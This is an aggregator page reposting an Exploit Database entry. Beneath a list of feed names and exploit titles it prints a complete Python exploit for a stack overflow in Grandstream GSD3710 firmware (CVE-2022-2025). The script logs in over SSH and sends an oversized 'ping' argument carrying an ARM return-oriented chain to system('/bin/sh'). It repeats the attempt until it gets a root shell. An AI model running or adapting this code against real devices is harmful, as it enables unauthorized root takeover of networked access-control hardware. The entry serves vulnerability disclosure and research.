惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
Check Point Blog
aimingoo的专栏
aimingoo的专栏
Jina AI
Jina AI
Microsoft Security Blog
Microsoft Security Blog
IT之家
IT之家
V
Visual Studio Blog
量子位
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 聂微东
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
大猫的无限游戏
大猫的无限游戏
Y
Y Combinator Blog
Stack Overflow Blog
Stack Overflow Blog
D
Docker
MyScale Blog
MyScale Blog
小众软件
小众软件
云风的 BLOG
云风的 BLOG
美团技术团队
Microsoft Azure Blog
Microsoft Azure Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
Last Week in AI
Last Week in AI
Apple Machine Learning Research
Apple Machine Learning Research
博客园 - 【当耐特】

The Exploit Database - CXSecurity.com

ProFTPD mod_sql post-authentication SQLi RCE Joomla Extension 4.1.4 PHP Object injection LuCI DHCPv6 Lease Hostname Stored Cross-Site Scripting strongSwan 5.9.13 DoS - CXSecurity.com OrkesConductor 3.30.2 Unauthenticated Remote Code Execution ArcadeDB < 26.7.2 Cross-Database Authorization Bypass (IDOR) Joomla Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution
Grandstream GSD3710 1.0.11.13 Stack Overflow
2025-06-29 · via The Exploit Database - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow # Date: 2025-05-29 # Exploit Author: Pepelux # Vendor Homepage: https://www.grandstream.com/ # Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower # Tested on: Linux and MacOS # CVE: CVE-2022-2025 """ Author: Jose Luis Verdeguer (@pepeluxx) Required: Pwntools Example: $ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD """ from struct import pack import sys from time import sleep import argparse from pwn import * def get_args(): parser = argparse.ArgumentParser( formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( prog, max_help_position=50)) # Add arguments parser.add_argument('-i', '--ip', type=str, required=True, help='device IP address', dest="ip") parser.add_argument('-u', '--user', type=str, required=True, help='username', dest="user") parser.add_argument('-p', '--pass', type=str, required=True, help='password', dest="pwd") # Array for all arguments passed to script args = parser.parse_args() try: ip = args.ip user = args.user pwd = args.pwd return ip, user, pwd except ValueError: exit() def check_badchars(payload): for i in range(5, len(payload)): if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]: log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i)) return True return False def main(): ip, user, pwd = get_args() libc_base = 0x76bb8000 gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc}; bin_sh = libc_base + 0xCEA9C # /bin/sh system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc exit = libc_base + 0x2660C print("[*] Libc base: %#x" % libc_base) print("[*] ROP gadget: %#x" % gadget) print("[*] /bin/sh: %#x" % bin_sh) print("[*] system: %#x" % system) print("[*] exit: %#x\n" % exit) padding = b"A" * 320 payload = b'ping ' payload += padding payload += p32(gadget) payload += p32(bin_sh) payload += b"AAAA" payload += p32(system) payload += p32(exit) if check_badchars(payload): sys.exit(0) count = 1 while True: print('Try: %d' % count) s = ssh(user, ip, 22, pwd) p = s.shell(tty=False) print(p.readuntil(b"GDS3710> ")) p.sendline(payload) p.sendline(b"id") sleep(1) data = p.read() if str(data).find('root') > -1: print('PWNED!') p.interactive() s.close() sys.exit() s.close() count += 1 if __name__ == '__main__': main()